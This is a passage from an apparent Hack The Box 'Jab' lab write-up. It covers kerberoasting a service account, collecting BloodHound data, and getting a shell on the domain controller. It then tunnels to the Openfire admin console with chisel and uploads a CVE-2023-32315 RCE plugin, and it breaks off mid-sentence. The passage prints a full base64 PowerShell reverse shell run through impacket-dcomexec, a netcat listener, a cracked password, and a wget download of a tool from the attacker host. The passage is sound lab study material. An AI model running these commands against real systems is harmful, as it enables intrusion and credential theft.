77.21518987341771%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAPCAYAAADkmO9VAAAACXBIWXMAAAsTAAALEwEAmpwYAAACT0lEQVR42m1U2ZKiQBDkW3YOQdDhplsQEUTRuY/YiN3//4/crEJxYmIfMqovsiqzq3H8ZQbPT+B6Mbx5gnmQ6vzXTQA/yBAsCwSLXKHrt4v/4uaO0SvhrOwWVX2AKXus1nvGHYpVRyKLm1mE21mM2/sx3nspZvOMSOFqHOGe1+7diITZDq09obEDNmZAne+xaZ5Qbx+x3pyII8cnJjsw0Q5Z0SK3HdK80RgmayULkxpByApLVtS1JOSHLT9sG8buGQ3R7d+IV/TDu86FsKwHJbfVnuOjxsw0cIMCrl/AqUnQdU+I0xqFYfZizKwwHS3Yo7BiQw9DCIHlmpCWhKyFSUWyUb5jbKtVrXmwoo8VKx5lPmpVabFFQnkxIXJlnjFxkm91Lc42WISrK2FCD6zZwrAygeUhw+oqSqtInLHKgnMhkKpFtkSpTKqX8SK0V0LJMEmUg2U/wVa93rp2QDXKK84wVCTfim/BgzkTpnAiLooEf2EwJzyae4k+W0fiT4z7Zpr7y2+E+Wqn7aEG6wV0eIjXar7K4r5cgPj4EFd6y3KuXA9n7/IfhHa8BPHr0hZjf9U6lhuVvZUm3KkaafqLCsHMZ1N7iTa4Ixk8wr0gyHkgn6T9xCQ7uNojld258UgoPi2jUstfhKVCul+S3E1P7TvGxBIva1LdRCj99vL2B4fjJw6nL5yef+P1/S+6w7s+uThrEFG+JInSWq0QROco++KhEtJHR8zv+bFASPvhA23/goHkw+lTn93++IHh8Uv3DhzrGqFvm54uo5X+PITwH3PI7joeJjpMAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="pidgin pentest2003 user with SPN" title="" src="/static/a5ef066151b30774bd33ebca532e5a8c/50637/pidgin-pentest2003-user-with-SPN.png" srcset="/static/a5ef066151b30774bd33ebca532e5a8c/dda05/pidgin-pentest2003-user-with-SPN.png 158w, /static/a5ef066151b30774bd33ebca532e5a8c/679a3/pidgin-pentest2003-user-with-SPN.png 315w, /static/a5ef066151b30774bd33ebca532e5a8c/50637/pidgin-pentest2003-user-with-SPN.png 630w, /static/a5ef066151b30774bd33ebca532e5a8c/06b13/pidgin-pentest2003-user-with-SPN.png 796w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>The <code class="language-text">svc_openfire</code> account was successfully kerberoasted to reveal the plaintext password:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/f6309d8e1cdd3aeac77c1f8bc8c28d29/7c5b2/pidgin-pentest2003-svc_openfire-cracked-password.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 81.0126582278481%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAQCAYAAAAWGF8bAAAACXBIWXMAAAsTAAALEwEAmpwYAAACV0lEQVR42o1UWZbiMAzMZZhhXwJkY01CAoSQhZ2mZ+5/C41Ktunuv/moJ1uWSiXFsTUc+DQdL2hsz2liz8iZLGg6WZLrb8jxInLYuoGCN0uU1Wt/nsoedsgcjeaIrLGz5qSYk2PyZynZkxW1ui61+x61e4yutgD7Otrf6ftvP3wtjms0bbJGrAak3UFA/dGcesOZEBqoJPeH742e9yPuV4sJ7emaQNrsONRsT8WaABMsZ/+BBgjRbrgpKGIsw4PYKCko2daU7GparDOypyvpYuyEYiFi4oaM6L2Gvz8KyNqkFZWnFx2ONzpWT8rLh6DgNfxF/aH29ZOOpcI+v0ossDtcOPcucbNlSlacllSdP99OEB2Ku5DlnIx9JsUecg4SEwMYARDkBjEr3FZ0vv6VytX59VZWcjISiuqDKuy/Qxc2axBi7QYRWZhVffkjAUgu6xcTfKqkb8E1d3HktSjUZ1BVatUnFuVBYbo76fZUsJkTZgY/VJuCZgQoeGKfaRfn6GLqhWSF8VHP4M4DvkqbUILBgyAvHjLDjPeIUbjp4kzI8YiFYpnhiq9KbgbMQHJeqiQzeDN8+UCcLAWkiL4ZherOEYV87/AFhUgTHt6KVJIqqCyI1VVRZ19Fb9zyGgpz5eCAfabu1J4TkuxMW7YpYyeqVAc4RzG0CWtGgvb7Qx/XppYvlckXewkZEi+CG13Yf8O942RzRYQEyvUlRy7GMeDXygoWWwJpzH9MnJQU8m8XRzk9w4zOqx3dowNd2Tr8vA34JbL5v8dTNRwvaQRMFAb2gn63x/QPGBhF4OCFRqwAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="pidgin pentest2003 svc_openfire cracked password" title="" src="/static/f6309d8e1cdd3aeac77c1f8bc8c28d29/50637/pidgin-pentest2003-svc_openfire-cracked-password.png" srcset="/static/f6309d8e1cdd3aeac77c1f8bc8c28d29/dda05/pidgin-pentest2003-svc_openfire-cracked-password.png 158w, /static/f6309d8e1cdd3aeac77c1f8bc8c28d29/679a3/pidgin-pentest2003-svc_openfire-cracked-password.png 315w, /static/f6309d8e1cdd3aeac77c1f8bc8c28d29/50637/pidgin-pentest2003-svc_openfire-cracked-password.png 630w, /static/f6309d8e1cdd3aeac77c1f8bc8c28d29/7c5b2/pidgin-pentest2003-svc_openfire-cracked-password.png 728w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>With the credentials for <code class="language-text">svc_openfire</code>, I used <code class="language-text">netexec</code> to collect BloodHound data:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Jab] └─$ netexec ldap 10.10.11.4 -u 'svc_openfire' -p '!@#$%^&amp;*(1qazxsw' --bloodhound --collection all --dns-server 10.10.11.4 SMB 10.10.11.4 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:jab.htb) (signing:True) (SMBv1:False) LDAPS 10.10.11.4 636 DC01 [+] jab.htb\svc_openfire:!@#$%^&amp;*(1qazxsw LDAPS 10.10.11.4 636 DC01 Resolved collection methods: acl, objectprops, container, group, trusts, dcom, psremote, localadmin, rdp, session LDAP 10.10.11.4 389 DC01 Done in 02M 58S LDAPS 10.10.11.4 636 DC01 Compressing output into /home/kali/.nxc/logs/DC01_10.10.11.4_2024-07-19_202828_bloodhound.zip</code></pre></div> <p>In BloodHound, viewing First Degree DCOM Privileges for <code class="language-text">svc_openfire</code> showed that the user had ExecuteDCOM on <code class="language-text">dc01.jab.htb</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 570px; " > <a class="gatsby-resp-image-link" href="/static/64a151fec0d877bb28e3dc00e8772568/2cee3/first-degree-dcom-privileges-svc_openfire.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 36.075949367088604%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAYAAAAIy204AAAACXBIWXMAAAsTAAALEwEAmpwYAAABSElEQVR42n1Ry0rDQBTtypUFKy7EIooW834bJ5mmSRpMjaWt7SJqUYviQrrQhbh05cqP8Q/8A3/qOJMSqRJcHObcy5lzXzX9KEQJze1Ap4x7i9ggEUwvLsA5R6HlnOWW/5aoLQdcpKgUus1NGXfakG0KyfKLVz0MWNEQwoGCneY2VJMU5hWGHZg0RmvXRGO6iXq4DlOhiLIResMc44sZsrMcNOlDsn1c6goebA2BKENiBYy/hnxUiybYWGti5X0Vjds9DLMb3M0fcX59XxiejHIkp2OoJEQqSXihBGJLgFbdYQibJJDbBPXXLTx9fmH29oF92WTjUggGKcYWGbw4A0kyqGzPcX8Cy48Xuy8NecCX3mXV00GONJmgf/WMbDpH3Bv8HKME17rBMUjYg+N3/z8KNze8CJpNoDkey0WVl+Q6zQ1+dVYafgPtleo29P+4ewAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="First Degree DCOM Privileges svc_openfire" title="" src="/static/64a151fec0d877bb28e3dc00e8772568/2cee3/first-degree-dcom-privileges-svc_openfire.png" srcset="/static/64a151fec0d877bb28e3dc00e8772568/dda05/first-degree-dcom-privileges-svc_openfire.png 158w, /static/64a151fec0d877bb28e3dc00e8772568/679a3/first-degree-dcom-privileges-svc_openfire.png 315w, /static/64a151fec0d877bb28e3dc00e8772568/2cee3/first-degree-dcom-privileges-svc_openfire.png 570w" sizes="(max-width: 570px) 100vw, 570px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>DCOM privileges can allow a user to execute commands on a remote machine by creating a COM object and calling its methods. So, to obtain a reverse shell, I took the PowerShell #3 (Base64) command from <a href="https://www.revshells.com/" target="_blank">revshells</a>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AOQAiACwANAA0ADMAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA</code></pre></div> <p>Then, after starting a listener with Netcat, I used <code class="language-text">impacket-dcomexec</code> and specified the DCOM object <code class="language-text">MMC20</code> (Management Console 2.0) to send the shell:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Jab] └─$ impacket-dcomexec -object MMC20 -silentcommand jab.htb/svc_openfire:'!@#$%^&amp;*(1qazxsw'@10.10.11.4 'powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AOQAiACwANAA0ADMAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA' Impacket v0.11.0 - Copyright 2023 Fortra</code></pre></div> <p><code class="language-text">nc</code> caught a shell as <code class="language-text">svc_openfire</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Jab] └─$ nc -lvnp 443 listening on [any] 443 ... connect to [10.10.14.9] from (UNKNOWN) [10.10.11.4] 62959 PS C:\windows\system32> whoami jab\svc_openfire PS C:\windows\system32> cd /users/svc_openfire/desktop PS C:\users\svc_openfire\desktop> ls Directory: C:\users\svc_openfire\desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -ar--- 7/19/2024 8:23 PM 34 user.txt</code></pre></div> <p>Once a shell was obtained, I enumerated the machine and found an Openfire configuration file in <code class="language-text">C:\program files\openfire\conf</code> which was connecting locally to the admin console on port <code class="language-text">9090</code> (HTTP) and <code class="language-text">9091</code> (HTTPS):</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">PS C:\program files\openfire\conf> cat openfire.xml &lt;?xml version="1.0" encoding="UTF-8"?> &lt;...snip...> &lt;jive> &lt;adminConsole> &lt;!-- Disable either port by setting the value to -1 --> &lt;port>9090&lt;/port> &lt;securePort>9091&lt;/securePort> &lt;interface>127.0.0.1&lt;/interface> &lt;/adminConsole> &lt;locale>en&lt;/locale> &lt;...snip...> &lt;connectionProvider> &lt;className>org.jivesoftware.database.EmbeddedConnectionProvider&lt;/className> &lt;/connectionProvider> &lt;setup>true&lt;/setup> &lt;fqdn>dc01.jab.htb&lt;/fqdn> &lt;/jive></code></pre></div> <p><code class="language-text">netstat</code> confirmed that the machine was listening on local ports <code class="language-text">9090</code> and <code class="language-text">9091</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">PS C:\program files\openfire> netstat -ano | findstr LISTENING &lt;...snip...> TCP 127.0.0.1:9090 0.0.0.0:0 LISTENING 3248 TCP 127.0.0.1:9091 0.0.0.0:0 LISTENING 3248 &lt;...snip...></code></pre></div> <p>To access the admin console, I needed to forward port <code class="language-text">9090</code> from <code class="language-text">DC01</code> to my VM. So, I started a python web server and downloaded <a href="https://github.com/jpillora/chisel" target="_blank">Chisel</a> onto <code class="language-text">DC01</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">PS C:\programdata> wget 10.10.14.9:8000/chisel.exe -o chisel.exe</code></pre></div> <p>Next, I started the server on my VM:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Jab] └─$ /opt/chisel/chisel server --port 8000 --reverse 2024/07/19 21:21:59 server: Reverse tunnelling enabled 2024/07/19 21:21:59 server: Fingerprint H7xLm8M3BxWvgIN8dcGy/4zNkxWacI+Rqj0nV+X+TaE= 2024/07/19 21:21:59 server: Listening on http://0.0.0.0:8000</code></pre></div> <p>Then, from <code class="language-text">DC01</code>, I connected the client:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">PS C:\programdata> ./chisel.exe client 10.10.14.9:8000 R:9090:localhost:9090</code></pre></div> <p>The server received a connection:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Jab] └─$ /opt/chisel/chisel server --port 8000 --reverse 2024/07/19 21:21:59 server: Reverse tunnelling enabled 2024/07/19 21:21:59 server: Fingerprint H7xLm8M3BxWvgIN8dcGy/4zNkxWacI+Rqj0nV+X+TaE= 2024/07/19 21:21:59 server: Listening on http://0.0.0.0:8000 2024/07/19 21:24:30 server: session#1: tun: proxy#R:9090=>localhost:9090: Listening</code></pre></div> <p>Visiting <code class="language-text">http://127.0.0.1:9090</code> displayed the Openfire admin console login page:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 451px; " > <a class="gatsby-resp-image-link" href="/static/58f53966b78e684f7db3c5c976fe30ca/08411/openfire-admin-console-login-form.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 117.08860759493672%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAXCAYAAAALHW+jAAAACXBIWXMAAAsTAAALEwEAmpwYAAACsUlEQVR42qVVzUtUURR/i0RqkZoucsyNSf9DRGZCKi0aW9SuTav2LYTEPpQSZVqNjRudwsQPogwsC0qiDBUNwmrhppaSRPPmvXnzPu597/46976ZQWRixvHBj3MP557fO1/3Xq2m5RJqT0ZxpPkiDh3vRFVj174gfQ6Tr+SQXFpdaxTVTd3o6LmJ4fgsBmKTGHz4lECysC6Oe2QfGZ1F55VeVEe6Ibm0+lOXodW2I0YG+XHuo9wvvzeRfAmtpg0NkksR1rVjJD6jjI7rgpNkqR24H4bAtlcQkO5zDs9jYCS57ys4rqd84uMvKKhzqC8Q7o6QMSXdHx9hTd+As7WEtc0trK6vY23jC75++w4ra6s9krx4hEVSFnYGwa9NBK4Nw8rCdhwVved5EEKUSHkXoe8HCIIAetqAbmaQNtIwDAOmaSKTIT2dVpB7yiKUtQn/zsA9qielxRhX0icbo5LItYyyBOHcvrtcXg2tHcrbhR+IMBrfr2BsFGE4Nnx7lWZnB7bn428qBTNjVUo4l0vDV/XJd1J1PKfvhaxt6ZRtHQiY6rYcEZ6rUwUR5gj1nzTVf2C7DCldLwxx5SnTqAgeAoGnkNcLYCGYnS3/pBzscqCDHXv0TJYfbOMBxGofxMptiM/9EMskl+9DfBqCeEf6235gkbDQB74wQD4BEk8W9hK2ITY2T8YUvKkWBMlGBOMnIMaaIEZJJk9DjJ+BGIpADEaAO03ArUbw3maq0W8kJt9AO3r2Pyl71ASele2mAXdCSJ3RPHInBCMby4K7YcMSE0Xuw+H8fejRuaULUMK0bOiGhYztIm1mYTkuwQvtItxb+j48aFPqWntQRQ9N9FofZp6/x8TUazyeXiwLE1OvMDu/hKvX79JjdQHHiEvLv3ryodLqz0Nr6NgfyKc60lV49f4BCMZwFB2M/nIAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="openfire admin console login form" title="" src="/static/58f53966b78e684f7db3c5c976fe30ca/08411/openfire-admin-console-login-form.png" srcset="/static/58f53966b78e684f7db3c5c976fe30ca/dda05/openfire-admin-console-login-form.png 158w, /static/58f53966b78e684f7db3c5c976fe30ca/679a3/openfire-admin-console-login-form.png 315w, /static/58f53966b78e684f7db3c5c976fe30ca/08411/openfire-admin-console-login-form.png 451w" sizes="(max-width: 451px) 100vw, 451px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>I logged in with the credentials for <code class="language-text">svc_openfire</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/be9f1cbb35e935a097607ca91187e3cd/4c5e0/openfire-admin-console.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 55.06329113924051%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAALCAYAAAB/Ca1DAAAACXBIWXMAAAsTAAALEwEAmpwYAAAByUlEQVR42pVSyY7UMBTs//8fzhxAXOcAw2iYTmdxJ17iOPu+FO+56R6EhBCRSs927HpVLp/24BPK0sFVNfbjwP9+67piGEf0XYe5b3Bqv3+A+/ERUmk4V6Ai8qqqUNLYN6LaNjXmacI0DoQRE49/YaR527a0p0HXEqGNnlCcvyBXKZQIIeM3ZCJCGr4iI8hrAp2ckUsBkyUw8orcWuR5/oCl+R2nuumQXDMoJbEsC1ZC3/foh8FX4N/X8PuOE9sTQpC9CvM8Y9t2NCS/KApvvetab4nX6rr2a1x5vq8Djp2wdti35Z1QKeXV3Ag3fyhNUwRBgCQRHlLKh708t0RYweln1O4Fo/uKbSreCY0xGMjinZCr1tqTGJ3Rf+2b8B7+z8myIpM9IQk+oyu/YVsqb/1hmTvfCdkuKzSGFeW+obWO1h0swRgLV1jUxQvhGcd0wTqVN0IOgon4CfhQqDvfz932hWwHb6/QaYimUOicoWrQOo19EZRIimOJMI/uRvhnYqywo0fKdsMwQhwGEOEZqUiQXgVqepsTWR/7Fvsc04GEQmHC4u+EHBAHEEcxzkR2CUNkmYSie9Vkn0NxzmLpBbZRYB1ianJT+BMlGEiuGAsnDAAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="openfire admin console" title="" src="/static/be9f1cbb35e935a097607ca91187e3cd/50637/openfire-admin-console.png" srcset="/static/be9f1cbb35e935a097607ca91187e3cd/dda05/openfire-admin-console.png 158w, /static/be9f1cbb35e935a097607ca91187e3cd/679a3/openfire-admin-console.png 315w, /static/be9f1cbb35e935a097607ca91187e3cd/50637/openfire-admin-console.png 630w, /static/be9f1cbb35e935a097607ca91187e3cd/fddb0/openfire-admin-console.png 945w, /static/be9f1cbb35e935a097607ca91187e3cd/4c5e0/openfire-admin-console.png 966w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Openfire has an option to upload plugins directly as <code class="language-text">.jar</code> files:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/928a586140c70c1d10fedd6155fa83f6/4c5e0/openfire-plugins-page.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 64.55696202531645%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAANCAYAAACpUE5eAAAACXBIWXMAAAsTAAALEwEAmpwYAAAB1UlEQVR42p1TW47bMBDz/U/Uj/71BIsC3SKbTTaOnVi25bckyy+Wo2S3KJoWaAUQFASbM6RG0br7DK1z6LrBtm341zXPM6y1MMMAPzSIWpWgpphSOZqmQdu2d3Ro6hL97hOGyxP8tMD7kfC/YBxHDBTr+56iPSKVJajSAwqVIb1ccL1ekWUZLuRrmiD7/gXq+BVFqVEUxUOUZfmBqNYlsksKY0xof5qmUPF/7MuKpmmmnSm0LmLrskBXFSqiqws0pULHCIyx6LouWBNIUYGcCS/8Lwg+qpLRbnKO0WpFFEjTNMQg2UrOUkyiCTY193eHDwXF6sDbkmycBO480muGt7cj4jjG6XT6uLyyyFG2BobsrcH2SHBdV9qob5a7Ft1gEJ8TxBTSWgeIZbGqywJVx5Hh2WiGx4ILBe3QYug7tHVN7lHRVsuueoq8Z/YuKgUHsvtTh4tzqM9njlKKkV1aWhcOe2bmlIJjXo7f3WBhyQKJ63dBfrz/9ozX/QFpcobiZRxfD9jvXpDnOWoWsuxQLuEGG1heSxDc1gU/sWLhaxiZjb93tdCOsGNOsp8JGS/BKK9Fxm10gWV0otU7rKMhOEveYhVMN0iRvy0RnPnf5lqKGs6yxw92h+tn5oNxKAAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="openfire plugins page" title="" src="/static/928a586140c70c1d10fedd6155fa83f6/50637/openfire-plugins-page.png" srcset="/static/928a586140c70c1d10fedd6155fa83f6/dda05/openfire-plugins-page.png 158w, /static/928a586140c70c1d10fedd6155fa83f6/679a3/openfire-plugins-page.png 315w, /static/928a586140c70c1d10fedd6155fa83f6/50637/openfire-plugins-page.png 630w, /static/928a586140c70c1d10fedd6155fa83f6/fddb0/openfire-plugins-page.png 945w, /static/928a586140c70c1d10fedd6155fa83f6/4c5e0/openfire-plugins-page.png 966w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>There's an exploit <a href="https://github.com/miko550/CVE-2023-32315" target="_blank">here</a> on GitHub for CVE-2023-32315 which is an Openfire admin console authentication bypass. Since I already had access to the console, the authentication bypass wasn't necessary. However, the repo also contains a plugin (<code class="language-text">openfire-management-tool-plugin.jar</code>) to get RCE once access to the admin console has been obtained.</p> <p>I uploaded <code class="language-text">openfire-management-tool-plugin.jar</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/7b7de321ed419d3eb6082e4eb4f1e131/4c5e0/openfire-upload-plugin.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 69.62025316455697%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAOCAYAAAAvxDzwAAAACXBIWXMAAAsTAAALEwEAmpwYAAAB1klEQVR42p1T266bMBDk//+oD33rD1R96iWXnmDAYGMwNgaCme4aEbVHSaXW0mhNCLOzs7tZ/P4Rra6hTYdt2/Cv536/YxxHeO8w+w6ZlTlaIpOyRtd16Ps+xY5jq2C/fYATnzHNd0xTIEx/IISAYRgwWAtHMZOVgBZnNLJCURQoyxJVVaVYFjmqr58gr1/QKI2maZ5CKfVAZlpNHwqS7JP8ZVko24AYI/7nZMuyk7B8jjGuUJ6yjgomGEKbfmN//4ZDQPY+A7+QUlLZJUydoy7foLVOPhljdn8JljxjHHeu7ikhn7qWyG83aFXD9l3yln1lWxic4Ebv2bNGG4jrFZ4SPldI8vtOQQjqftsSQUBRVsjz/NEsVsXvmrqGsiMcVTM5h+1Vydb2qbwQRtjB4+ctx+VySYSs9hgvpRro3sFRDP4F4brGpFBrRaXzbPYQxT5KXCqDyQyRKhoZ3ZGX9F8u+QXhioHkcxN4aNmzfYjDw8MD+4bQnSLfudvZs1U6nc84/TilbrNKIQQ1IU9DzFYcRI4SM7wb0vNTQvawNbR2vU2l8cdat0TcJMWMY+3meaaVXBJmQupynEeskyMMBJ8Q5x0bDfT78/swB16G0SGOHZbg0/MveAo5kjKfPe0AAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="openfire upload plugin" title="" src="/static/7b7de321ed419d3eb6082e4eb4f1e131/50637/openfire-upload-plugin.png" srcset="/static/7b7de321ed419d3eb6082e4eb4f1e131/dda05/openfire-upload-plugin.png 158w, /static/7b7de321ed419d3eb6082e4eb4f1e131/679a3/openfire-upload-plugin.png 315w, /static/7b7de321ed419d3eb6082e4eb4f1e131/50637/openfire-upload-plugin.png 630w, /static/7b7de321ed419d3eb6082e4eb4f1e131/fddb0/openfire-upload-plugin.png 945w, /static/7b7de321ed419d3eb6082e4eb4f1e131/4c5e0/openfire-upload-plugin.png 966w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>After uploading the 